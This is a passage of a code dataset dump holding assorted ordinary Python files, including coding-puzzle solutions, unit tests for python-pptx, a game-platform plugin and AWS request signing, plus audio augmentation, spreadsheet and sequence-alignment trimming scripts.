dt=dt,\n order=-1)\n print(\"--- Serial:\\t\\t{} seconds\".format(time.time() - start_time))\n data3_id = ss3_id.simulate(\n f_u=f_prbs_4d,\n x0=np.array([np.zeros(ss3_id.A.shape[0])]).T,\n tf=tf)\n print('fit {:f}%'.format(100 * sysid.subspace.nrms(data3_id.y, data_y[:, -1:])))\n\nif __name__ == \"__main__\":\n unittest.main()\n\n# vim: set et ft=python fenc=utf-8 ff=unix sts=4 sw=4 ts=4 :\n","sub_path":"sysid/test_subspace.py","file_name":"test_subspace.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"452975658","text":"import os\nfrom random import sample\nimport sys\n\ndef choose(seedNumber):\n\twith open('v92.finalResult', 'r') as f:\n\t\tlines = f.readlines()\n\ttitle = lines[0]\n\tlines = lines[1:]\n\tsubLines = sample(lines, seedNumber)\n\twith open('v92.finalResult_' + str(seedNumber), 'w+') as f:\n\t\tf.write(title)\n\t\tfor line in subLines:\n\t\t\tf.write(line)\n\ndef main():\n\tseedNumber = int(sys.argv[1])\n\tchoose(seedNumber)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bkscripts/choose_seed_distribution.py","file_name":"choose_seed_distribution.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"116483250","text":"import math\n\ndef solution(gems):\n cl=0\n cr=0\n \n gem_list = set(gems)\n gem_num = len(gem_list)\n \n gem_dict = zip(list(gem_list),[i for i in range(gem_num)])\n gem_dict = dict(gem_dict)\n # print(gem_dict)\n \n gem_list = [0 for _ in range(gem_num)]\n \n # print(gem_list)\n \n \n gems = [''] +gems\n N = len(gems)\n \n gem_cnt =0\n ans =[]\n \n min_len = math.inf\n \n while(1):\n if gem_cnt < gem_num:\n cr += 1\n \n if(cr == N): #넘어가면 종료\n break\n \n if gem_list[gem_dict[gems[cr]]] == 0: #새로운 보석\n gem_cnt += 1\n\n gem_list[gem_dict[gems[cr]]] += 1 # 보석담기\n\n else:\n cl += 1\n \n gem_list[gem_dict[gems[cl]]] -= 1 # 보석버리기\n \n if gem_list[gem_dict[gems[cl]]] == 0: # 종류 중 하나 남은 보석 버리기\n gem_cnt -= 1\n \n \n if gem_cnt == gem_num and (cr-cl) < min_len: # 최소거리\n min_len= cr-cl\n ans = [cl+1,cr]\n \n# print(gem_list)\n# print(gem_cnt) \n \n # print(ans)\n \n return ans","sub_path":"대회,기출/카카오_2020_보석쇼핑.py","file_name":"카카오_2020_보석쇼핑.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"104778654","text":"import asyncio\nimport json\n\nfrom galaxy.api.plugin import Plugin\nfrom galaxy.api.consts import Platform\n\ndef test_get_capabilites(reader, writer, read, write):\n class PluginImpl(Plugin): #pylint: disable=abstract-method\n async def get_owned_games(self):\n pass\n\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"3\",\n \"method\": \"get_capabilities\"\n }\n token = \"token\"\n plugin = PluginImpl(Platform.Generic, \"0.1\", reader, writer, token)\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"3\",\n \"result\": {\n \"platform_name\": \"generic\",\n \"features\": [\n \"ImportOwnedGames\"\n ],\n \"token\": token\n }\n }\n\ndef test_shutdown(plugin, read, write):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"5\",\n \"method\": \"shutdown\"\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n plugin.shutdown.assert_called_with()\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"5\",\n \"result\": None\n }\n\ndef test_ping(plugin, read, write):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"7\",\n \"method\": \"ping\"\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"7\",\n \"result\": None\n }\n\ndef test_tick_before_handshake(plugin, read):\n read.side_effect = [b\"\"]\n asyncio.run(plugin.run())\n plugin.tick.assert_not_called()\n\ndef test_tick_after_handshake(plugin, read):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"6\",\n \"method\": \"initialize_cache\",\n \"params\": {\"data\": {}}\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n plugin.tick.assert_called_with()\n","sub_path":"tests/test_internal.py","file_name":"test_internal.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"459467569","text":"import os\nimport argparse\nimport json\n\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('voice_dir')\nparser.add_argument('json_file')\nparser.add_argument('--min_duration', type=int, default=0)\nparser.add_argument('--max_duration', type=int, default=1000)\nparser.add_argument('--test_size', type=float, default=0.2)\nparser.add_argument('--random_state', type=int, default=42)\n\nif __name__=='__main__':\n args = parser.parse_args()\n\n parent_dir = os.path.dirname(args.json_file)\n text_dir = os.path.join(parent_dir, 'transcribe')\n if not os.path.isdir(text_dir):\n os.mkdir(text_dir)\n text_dir = os.path.abspath(text_dir)\n voice_dir = os.path.abspath(args.voice_dir)\n\n with open(args.json_file) as f:\n data = f.readlines()\n \n voices = []\n texts = []\n\n for line in tqdm(data):\n conf = json.loads(line)\n text = conf['text']\n voice = conf['key']\n duration = conf['duration']\n if duration > args.min_duration and duration < args.max_duration:\n vp = os.path.join(voice_dir, voice[37:])\n tp = os.path.join(text_dir, voice[37:-4].replace('/','_')+'.txt')\n with open(tp, 'w') as f:\n f.write(text)\n voices.append(vp)\n texts.append(tp)\n\n train_voice, test_voice, train_text, test_text = train_test_split(\n voices, texts, \n test_size=args.test_size,\n random_state=args.random_state\n )\n\n train_df = pd.DataFrame({'voice':train_voice, 'text':train_text})\n test_df = pd.DataFrame({'voice':test_voice, 'text':test_text})\n\n train_df.to_csv(os.path.join(parent_dir,'train_manifest.csv'), header=False, index=False)\n test_df.to_csv(os.path.join(parent_dir,'test_manifest.csv'), header=False, index=False)","sub_path":"data/infore.py","file_name":"infore.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"585440445","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport json\nfrom datetime import date\n\nhoy=date.today()\n\nf = json.load(open(\"anuncios_as_\"+str(hoy)+\".json\"))\ng = json.load(open(\"rir_asns.json\"))\n# h = open(\"asns_\"+str(hoy)+\".html\", \"w\")\n# h.write(\"asn|rir|pfx_afrinic|pfx_apnic|pfx_lacnic|pfx_ripencc|pfx_arin
\")\nk = open(\"test_asns.html\", \"w\")\n\ntabla = ''\n\nfor i in f:\n afrinic = f[i][0]\n apnic = f[i][1]\n lacnic = f[i][2]\n ripe = f[i][3]\n arin = f[i][4]\n for j in g:\n if i in g[j]:\n rir = j\n # h.write(\"\"+str(i)+\"\"+\"|\"+str(rir)+\"|\"+str(afrinic)+\"|\"+str(apnic)+\"|\"+str(lacnic)+\"|\"+str(ripe)+\"|\"+str(arin)+\"
\")\n tabla = tabla + ''\n # print i, rir, afrinic, apnic, lacnic, ripe, arin\n\ntabla = tabla + '
ASNRIRAfrinic prefixApnic prefixLACNIC prefixRipe prefixArin prefix
'+str(i)+'
'+str(rir)+'
'+str(afrinic)+'
'+str(apnic)+'
'+str(lacnic)+'
'+str(ripe)+'
'+str(arin)+'
'\n\nk.write('Title
'+tabla+'
')\nk.close()\n","sub_path":"tabla_asns.py","file_name":"tabla_asns.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"555732176","text":"import numpy as np\nfrom scipy.io.wavfile import write\nimport librosa\nimport os\n\npath = \"deletethis\" #or whichever source folder\nos.chdir(path)\n\ndef load_audio_file(file_path):\n input_length = 1159168 \n data = librosa.core.load(file_path)[0] \n if len(data)>input_length:\n data = data[:input_length]\n else:\n data = np.pad(data, (0, max(0, input_length - len(data))), \"constant\")\n return data\n\ndef stretch(data, rate=1):\n input_length = 1159168\n data = librosa.effects.time_stretch(data, rate)\n if len(data)>input_length:\n data = data[:input_length]\n else:\n data = np.pad(data, (0, max(0, input_length - len(data))), \"constant\")\n\n return data\n\ndef manipulate(data, sampling_rate, pitch_factor):\n return librosa.effects.pitch_shift(data, sampling_rate, pitch_factor)\n\naudio_files = os.listdir()\n\nfor file in audio_files:\n name, ext = os.path.splitext(file)\n data = load_audio_file(file)\n wn = np.random.randn(len(data))\n data_wn1 = data + 0.005*wn\n write(\"andthis/{0}_wn1.wav\".format(name), 24100, data_wn1)\n data_roll1 = np.roll(data, 1600)\n write(\"andthis/{0}_roll1.wav\".format(name), 24100, data_roll1)\n data_stretch =stretch(data, 0.8)\n write(\"andthis/{0}_stretch1.wav\".format(name), 24100, data_stretch)\n data_stretch2 =stretch(data, 1.2)\n write(\"andthis/{0}_stretch2.wav\".format(name), 24100, data_stretch2)\n data_wn2 = data + 0.0009*wn\n write(\"andthis/{0}_wn2.wav\".format(name), 24100, data_wn2)\n data_roll2 = np.roll(data, 90000)\n write(\"andthis/{0}_roll2.wav\".format(name), 24100, data_roll2)\n data_pitch1 = manipulate(data, 24100, 0.1)\n write(\"andthis/{0}_pitch1.wav\".format(name), 24100, data_pitch1)\n data_pitch2 = manipulate(data, 24100, 0.2)\n write(\"andthis/{0}_pitch2.wav\".format(name), 24100, data_pitch2)","sub_path":"data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"549843901","text":"from support import *\r\n\r\ndef get_file():\r\n nums=[]\r\n with open(\"100_nums.txt\",'r') as in_file:\r\n for line in in_file:\r\n nums.append(int(line))\r\n return nums\r\n \r\nprint(add_list(get_file()))\r\n","sub_path":"p13.py","file_name":"p13.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"367785317","text":"class Solution(object):\n def maximumSwap(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n A = [int(c) for c in str(num)]\n if len(A) <= 1: return num\n m = len(A)\n nextG = [0] * m # next greater's index\n mx, mxidx = A[m-1], m - 1\n for i in xrange(m - 1, -1, -1):\n if mx >= A[i]:\n nextG[i] = mxidx\n else:\n nextG[i] = -1\n mx = A[i]\n mxidx = i\n\n ret = list(A)\n for i in xrange(m):\n if nextG[i] == -1: continue\n j = nextG[i]\n A[i], A[j] = A[j], A[i]\n if A > ret:\n ret = list(A)\n A[i], A[j] = A[j], A[i]\n return int(''.join([str(c) for c in ret]))\n","sub_path":"LC670.py","file_name":"LC670.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65408106","text":"from Domain.obiect import getLocatie, creeazaObiect, getId, getNume, getDescriere, getPret\n\ndef mutareObiecte(substringLocatieVeche, lista, locatieNoua):\n '''\n Mutarea tuturor obiectelor dintr-o locație în alta.\n :param substringLocatie: stringul dupa care se cauta locatia\n :param lista: lista de obiecte\n :return: lista in care obiectele care apartin de locatia data sunt mutate in alta locatie\n '''\n\n listaNoua=[]\n for obiect in lista:\n if substringLocatieVeche==getLocatie(obiect):\n obiectNou=creeazaObiect(\n getId(obiect),\n getNume(obiect),\n getDescriere(obiect),\n getPret(obiect),\n getLocatie(obiect).replace(getLocatie(obiect), locatieNoua)\n )\n listaNoua.append(obiectNou)\n else:\n listaNoua.append(obiect)\n return listaNoua\n\ndef concatenare(text, lista, pret):\n '''\n Concatenarea unui string citit la toate descrierile obiectelor cu prețul mai mare decât o valoare citită\n :param text: stringul care trebuie adaugat la descrierile obiectelor cu pretul mai mare decat o valoare citita\n :param lista: lista de obiecte\n :param pret: valoarea dupa care comparam pretul fiecarui obiect pt a verifica daca ii modificam descrierea\n :return: o lista noua in care toate descrierile obiectelor cu pretul mai mare decat valoarea data au fost modificate, concatenandu-se un string\n '''\n listaNoua=[]\n for obiect in lista:\n if getPret(obiect)>pret:\n obiectNou=creeazaObiect(\n getId(obiect),\n getNume(obiect),\n getDescriere(obiect) + str(text),\n getPret(obiect),\n getLocatie(obiect)\n )\n listaNoua.append(obiectNou)\n else:\n listaNoua.append(obiect)\n return listaNoua\n\n\ndef PretMaximLocatie(lista):\n '''\n Determinarea celui mai mare preț pentru fiecare locație\n :param lista: lista de obiecte\n :return: un dictionar cu cel mai mare pret pentru fiecare locatie\n '''\n rezultat={}\n for obiect in lista:\n locatie=getLocatie(obiect)\n if locatie in rezultat:\n if getPret(obiect)>rezultat[locatie]:\n rezultat[locatie]=getPret(obiect)\n else:\n rezultat[locatie]=getPret(obiect)\n return rezultat\n\ndef OrdonareDupaPret(lista):\n '''\n Ordonarea obiectelor crescător după prețul de achiziție.\n :param lista: lista de obiecte\n :return: Obiectele ordonate crescator dupa pretul de achizitie\n '''\n return sorted(lista, key=lambda obiect: getPret(obiect))\n\ndef sumaPreturilor(lista):\n '''\n Afișarea sumelor prețurilor pentru fiecare locație.\n :param lista: lista de obiecte\n :return: suma preturilor pentru fiecare locatie\n '''\n rezultat={}\n for obiect in lista:\n locatie=getLocatie(obiect)\n if locatie in rezultat:\n rezultat[locatie]=rezultat[locatie]+getPret(obiect)\n else:\n rezultat[locatie]=getPret(obiect)\n return rezultat\n\n","sub_path":"Logic/funct.py","file_name":"funct.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"139916138","text":"# encoding: utf-8\n\n\"\"\"Test suite for pptx.oxml.graphfrm module.\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom hamcrest import assert_that, equal_to, is_\n\nfrom pptx.oxml.ns import nsdecls, qn\nfrom pptx.oxml.shapes.graphfrm import CT_GraphicalObjectFrame\n\nfrom ...unitutil import TestCase\n\n\nclass TestCT_GraphicalObjectFrame(TestCase):\n \"\"\"Test CT_GraphicalObjectFrame\"\"\"\n def test_has_table_return_value(self):\n \"\"\"CT_GraphicalObjectFrame.has_table property has correct value\"\"\"\n # setup ------------------------\n id_, name = 9, 'Table 8'\n left, top, width, height = 111, 222, 333, 444\n tbl_uri = 'http://schemas.openxmlformats.org/drawingml/2006/table'\n chart_uri = 'http://schemas.openxmlformats.org/drawingml/2006/chart'\n graphicFrame = CT_GraphicalObjectFrame.new_graphicFrame(\n id_, name, left, top, width, height)\n graphicData = graphicFrame[qn('a:graphic')].graphicData\n # verify -----------------------\n graphicData.set('uri', tbl_uri)\n assert_that(graphicFrame.has_table, is_(equal_to(True)))\n graphicData.set('uri', chart_uri)\n assert_that(graphicFrame.has_table, is_(equal_to(False)))\n\n def test_new_graphicFrame_generates_correct_xml(self):\n \"\"\"CT_GraphicalObjectFrame.new_graphicFrame() returns correct XML\"\"\"\n # setup ------------------------\n id_, name = 9, 'Table 8'\n left, top, width, height = 111, 222, 333, 444\n xml = (\n '\\n \\n \\n \\n \\n \\n \\n <'\n '/p:nvGraphicFramePr>\\n \\n \\n '\n ' \\n \\n \\n \\n \\n\\n' %\n (nsdecls('a', 'p'), id_, name, left, top, width, height)\n )\n # exercise ---------------------\n graphicFrame = CT_GraphicalObjectFrame.new_graphicFrame(\n id_, name, left, top, width, height)\n # verify -----------------------\n self.assertEqualLineByLine(xml, graphicFrame)\n\n def test_new_table_generates_correct_xml(self):\n \"\"\"CT_GraphicalObjectFrame.new_table() returns correct XML\"\"\"\n # setup ------------------------\n id_, name = 9, 'Table 8'\n rows, cols = 2, 3\n left, top, width, height = 111, 222, 334, 445\n xml = (\n '\\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n \\n'\n ' \\n \\n \\n \\n \\n \\n {5C22544A-7EE6-4342-B048-85BDC9'\n 'FD1C3A}\\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n \\n \\n \\n \\n \\n <'\n 'a:bodyPr/>\\n \\n \\n '\n ' \\n \\n '\n '\\n \\n \\n \\n '\n ' \\n \\n \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n \\n \\n '\n ' \\n \\n \\n <'\n 'a:txBody>\\n \\n \\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n\\n' %\n (nsdecls('a', 'p'), id_, name, left, top, width, height)\n )\n # exercise ---------------------\n graphicFrame = CT_GraphicalObjectFrame.new_table(\n id_, name, rows, cols, left, top, width, height)\n # verify -----------------------\n self.assertEqualLineByLine(xml, graphicFrame)\n","sub_path":"tests/oxml/shapes/test_graphfrm.py","file_name":"test_graphfrm.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90506212","text":"import datetime\nimport json\n\nfrom getting_started.aws_signing import AwsSigningV4\n\nsigner = AwsSigningV4(\n aws_access_key_id=\"access key\",\n aws_secret_access_key=\"secret key\",\n aws_host=\"developer-api.dnb.no\",\n)\n\n\ndef test_aws_signing_get_request(mocker):\n with mocker.patch(\n \"getting_started.aws_signing.now\", return_value=datetime.datetime(2018, 6, 2)\n ):\n headers = signer.create_headers(path=\"/tokens\", method=\"GET\")\n\n assert headers[\"Authorization\"] == (\n \"AWS4-HMAC-SHA256 Credential=access key/20180602/eu-west-1/execute-api/aws4_request, \"\n \"SignedHeaders=host;x-amz-date, \"\n \"Signature=1672f85f04d1375ffc1f91881d4e3ff6a583242fce8c6d92ba15544a63dd4dcb\"\n )\n\n\ndef test_aws_signing_post_request(mocker):\n with mocker.patch(\n \"getting_started.aws_signing.now\", return_value=datetime.datetime(2018, 6, 2)\n ):\n headers = signer.create_headers(\n path=\"/tokens\", method=\"POST\", data=json.dumps({\"ssn\": \"29105573083\"})\n )\n\n assert headers[\"Authorization\"] == (\n \"AWS4-HMAC-SHA256 Credential=access key/20180602/eu-west-1/execute-api/aws4_request, \"\n \"SignedHeaders=host;x-amz-date, \"\n \"Signature=1f1eb16d666394ba57522b01db51e1da0f2f272a4b48aba9011e5c4bb8540cac\"\n )\n assert (\n headers[\"x-amz-content-sha256\"]\n == \"b80fb83935fba3770a2436d26c84767b99f487250b6b7505a470153c47ecdcbb\"\n )\n","sub_path":"python/tests/test_aws_signing.py","file_name":"test_aws_signing.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"352161280","text":"\"\"\"\nFind albums or items without MusicBrainz tags.\n\"\"\"\nfrom beets import plugins, ui\n\n\nREGEX = '^(?!\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})$'\n\n\nclass BrainlessPlugin(plugins.BeetsPlugin):\n def commands(self):\n def func(lib, opts, args):\n query = ui.decargs(args)\n\n if opts.album:\n field = 'mb_albumid'\n else:\n field = 'mb_trackid'\n\n query.append(\"%s::%s\" % (field, REGEX))\n ui.commands.list_items(lib, query, opts.album, opts.fmt)\n\n cmd = ui.Subcommand('brainless',\n help='Find items without MusicBrainz tags')\n cmd.parser.add_option('-a', '--album', action='store_true',\n help='Show matching albums instead of tracks')\n cmd.parser.add_option('-f', '--format', action='store', default='',\n dest='fmt', help='print with custom format')\n cmd.func = func\n return [cmd]\n","sub_path":".config/beets/plugins/brainless.py","file_name":"brainless.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"515466798","text":"from utils.spreadsheets.googlespreadsheet import SpreadSheet\nimport time\n\n\nclass GSpreadManager:\n def __init__(self, sneakers_list):\n self.spread_sheet = SpreadSheet()\n self.sneakers_list = sneakers_list\n\n self.start_index_rows_range = 0\n self.last_sneakers_number = 0\n self.names = []\n self.articles = []\n self.prices = []\n self.sneaker_sizes = []\n self.sneaker_urls = []\n self.sneaker_brands = []\n self.sneaker_image_urls = []\n\n def merge_cells(self):\n for i, sneaker in enumerate(self.sneakers_list):\n sneakers_number = len(sneaker[1])\n print(sneaker[1])\n print(sneaker)\n print(sneakers_number)\n\n self.start_index_rows_range += self.last_sneakers_number\n end_index_rows_range = self.start_index_rows_range + sneakers_number\n\n self.last_sneakers_number = sneakers_number\n\n if sneakers_number > 1:\n # while True:\n # try:\n merged = False\n while not merged:\n try:\n self.spread_sheet.merge_cells((self.start_index_rows_range, end_index_rows_range), 4)\n time.sleep(1.1)\n merged = True\n except Exception as e:\n time.sleep(101)\n\n def get_all_needed_data(self):\n for i, sneaker in enumerate(self.sneakers_list):\n for j, item in enumerate(sneaker[1]):\n price = item[1], url = item[3], article = item[2]\n name = item[0], brand = item[4], image = item[5]\n\n sizes = str(item[-1])\n\n self.prices.append(price)\n self.sneaker_sizes.append(sizes)\n self.articles.append(article)\n self.names.append(name)\n self.sneaker_urls.append(url)\n self.sneaker_brands.append(brand)\n self.sneaker_image_urls.append(image)\n\n #TODO:refactor\n def populate_sheet(self):\n self.merge_cells()\n self.get_all_needed_data()\n\n sneakers_len = str(sum(len(item[1]) for item in self.sneakers_list))\n cell_list_names = self.spread_sheet.sheet.range('A1:A{}'.format(sneakers_len))\n\n for i, val in enumerate(self.names):\n cell_list_names[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_names)\n time.sleep(1)\n ##################################################################################\n cell_list_articles = self.spread_sheet.sheet.range('B1:B{}'.format(sneakers_len))\n for i, val in enumerate(self.articles):\n cell_list_articles[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_articles)\n time.sleep(1)\n ##################################################################################\n cell_list_brands = self.spread_sheet.sheet.range('C1:C{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_brands):\n cell_list_brands[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_brands)\n #################################################################################\n cell_list_images = self.spread_sheet.sheet.range('D1:D{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_image_urls):\n formula = '=image(\"{}\")'.format(val)\n cell_list_images[i].value = formula\n\n self.spread_sheet.sheet.update_cells(cell_list_images, value_input_option='USER_ENTERED')\n #################################################################################\n cell_list_prices = self.spread_sheet.sheet.range('E1:E{}'.format(sneakers_len))\n for i, val in enumerate(self.prices):\n cell_list_prices[i].value = str(val)\n\n self.spread_sheet.sheet.update_cells(cell_list_prices)\n time.sleep(1)\n ##################################################################################\n cell_list_urls = self.spread_sheet.sheet.range('F1:F{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_urls):\n cell_list_urls[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_urls)\n ##################################################################################\n cell_list_sizes = self.spread_sheet.sheet.range('G1:G{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_sizes):\n cell_list_sizes[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_sizes)\n\n\n","sub_path":"managers/gspreadmanager.py","file_name":"gspreadmanager.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"70338254","text":"from collections import defaultdict\n\nwith open('input.txt', 'r') as f:\n numbers = [int(num) for num in f.read().split()]\n\n\ntree = defaultdict(list)\n\ntotal = 0\n\n\ndef sum_metadata(entries):\n childs = entries[0]\n metadata = entries[1]\n\n entries = entries[2:]\n sum_entires = 0\n\n for i in range(childs):\n sum_node, entries = sum_metadata(entries)\n sum_entires += sum_node\n\n sum_entires += sum(entries[:metadata])\n\n return sum_entires, entries[metadata:]\n\n\ndef root_node_val(entries):\n childs = entries[0]\n metadata = entries[1]\n\n entries = entries[2:]\n child_nodes = []\n\n for i in range(childs):\n child_node_value, entries = root_node_val(entries)\n child_nodes.append(child_node_value)\n\n if childs == 0:\n return sum(entries[:metadata]), entries[metadata:]\n\n return sum(child_nodes[i - 1] for i in entries[:metadata]\n if 1 <= i <= len(child_nodes)), entries[metadata:]\n\n\nfirst_part = sum_metadata(numbers)\nprint('First part: {0}'.format(first_part[0]))\n\nsecond_part = root_node_val(numbers)\nprint('Second part: {0}'.format(second_part[0]))\n","sub_path":"day_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"472502840","text":"import time\nimport numpy as np\nfrom scipy.stats import t\n\n\ndef prob_estimator(game, player, max_err=0.03, min_games=10, max_games=1000, max_time=10 * 60, alpha=0.95, verbose=1, random_start=True):\n \"\"\"Runs simulations of game until the expected winning probability for player is estimated with x in such a way that the true probability lays in an interval ]x-max_err, x+max_err[ with probability alpha\"\"\"\n\n n_games = 0\n samples = []\n err = max_err + 1\n win = 0.0\n player = str(player)\n\n start = last = time.time()\n while (err > max_err and 2 * time.time() - start - last <= max_time and n_games < max_games) or n_games < min_games:\n last = time.time()\n result = str(game.run_game(verbose=0, current_player='random' if random_start else None))\n if result == player:\n win = 1.0\n elif result == 'draw':\n win = 0.0\n else:\n win = -1.0\n n_games += 1\n samples.append(win)\n sample_var = np.var(samples, ddof=1)\n if n_games >= min_games:\n err = abs(t.ppf(alpha, n_games - 1) * np.sqrt(sample_var / n_games))\n if verbose > 1:\n print('time: {:.1f}, n_games: {}, error: {:.3f}, exp: {:.3f}'.format(time.time() - start, n_games, err, np.mean(samples)))\n if verbose > 0:\n print('time: {:.1f}, n_games: {}, error: {:.3f}, exp: {:.3f}'.format(time.time() - start, n_games, err, np.mean(samples)))\n return np.mean(samples), err\n","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107928188","text":"from Bio import AlignIO\nfrom ..sequence_backmapper.sequence_backmapper import SequenceBackmapper\nimport logging\n\"\"\"Trims MSA data by gap percentage or removing all gaps corresponding to best\nmatching sequence to a reference sequence.\n\nAuthor: Mehari B. Zerihun\n\"\"\"\n\nlogger = logging.getLogger(__name__)\n\nclass MSATrimmerException(Exception):\n \"\"\"Raises exceptions related to MSA trimming\n \"\"\"\n\nclass MSATrimmer:\n\n def __init__(self, msa_file, biomolecule=None,max_gap=None, refseq_file=None):\n \"\"\"\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer class\n msa_file : str\n Path to the FASTA formatted MSA file\n biomolecule : str\n Type of biomolecule (protein or RNA)\n \"\"\"\n self.__msa_file = msa_file\n self.__refseq_file = refseq_file\n self.__max_gap = 0.5 if max_gap is None else max_gap\n if self.__max_gap > 1.0 or self.__max_gap < 0.0:\n logger.error('\\n\\tThe value of max_gap should be between 0 and 1')\n raise MSATrimmerException\n if biomolecule is not None:\n self.__biomolecule = biomolecule.strip().upper()\n else:\n self.__biomolecule = biomolecule\n self.__alignment_data = list(AlignIO.read(self.__msa_file, 'fasta'))\n\n logger.info('\\n\\tMSA file: {0}'\n '\\n\\tReference sequence file: {1}'\n '\\n\\tbiomolecule: {2}'\n ''.format(self.__msa_file, self.__refseq_file,\n self.__biomolecule,\n )\n )\n return None\n\n\n @property\n def alignment_data(self):\n \"\"\"\n \"\"\"\n return self.__alignment_data\n\n\n def compute_msa_columns_gap_size(self):\n \"\"\"Computes the gap size of each column in MSA\n\n Parameters\n ----------\n self : MSATrimmer\n Instance of MSATrimmer class\n\n Returns\n -------\n msa_columns_gap_size : tuple\n A tuple of column gap sizes. The column gap size is computed as\n the fraction of gaps in a particular MSA column.\n\n \"\"\"\n logger.info('\\n\\tObtaining columns containing more than {}% of gaps'.format(\n self.__max_gap * 100)\n )\n seqs_len = len(self.__alignment_data[0].seq)\n num_seqs = len(self.__alignment_data)\n logger.info('\\n\\tTotal number of sequences read from MSA file:{}'\n '\\n\\tLength of the sequences:{}'.format(num_seqs, seqs_len)\n )\n msa_columns_gap_size = list()\n for i in range(seqs_len):\n num_gaps = 0\n for record in self.__alignment_data:\n state_i = record.seq[i]\n if state_i == '.' or state_i == '-': num_gaps += 1\n gap_fraction_i = float(num_gaps)/float(num_seqs)\n msa_columns_gap_size.append(gap_fraction_i)\n max_gap_size = max(msa_columns_gap_size)\n min_gap_size = min(msa_columns_gap_size)\n logger.info('\\n\\tMinimum and maximum gap percentages, respectively:'\n '{0:.2f}% and {1:.2f}%'.format(max_gap_size * 100, min_gap_size * 100)\n )\n return tuple(msa_columns_gap_size)\n\n\n def msa_columns_beyond_max_gap(self):\n \"\"\"Obtains the columns in MSA tha contain more than the given fraction of\n gaps treshold.\n\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer class\n\n Returns\n -------\n msa_columns_beyond_max_gap : tuple\n A tuple of MSA columns that contain fraction of gaps beyond the\n max_gap\n \"\"\"\n columns_gap_size = self.compute_msa_columns_gap_size()\n seqs_len = len(self.__alignment_data[0].seq)\n msa_columns_beyond_max_gap = [\n i for i in range(seqs_len) if columns_gap_size[i] > self.__max_gap\n ]\n return tuple(msa_columns_beyond_max_gap)\n\n\n def trim_by_gap_size(self):\n 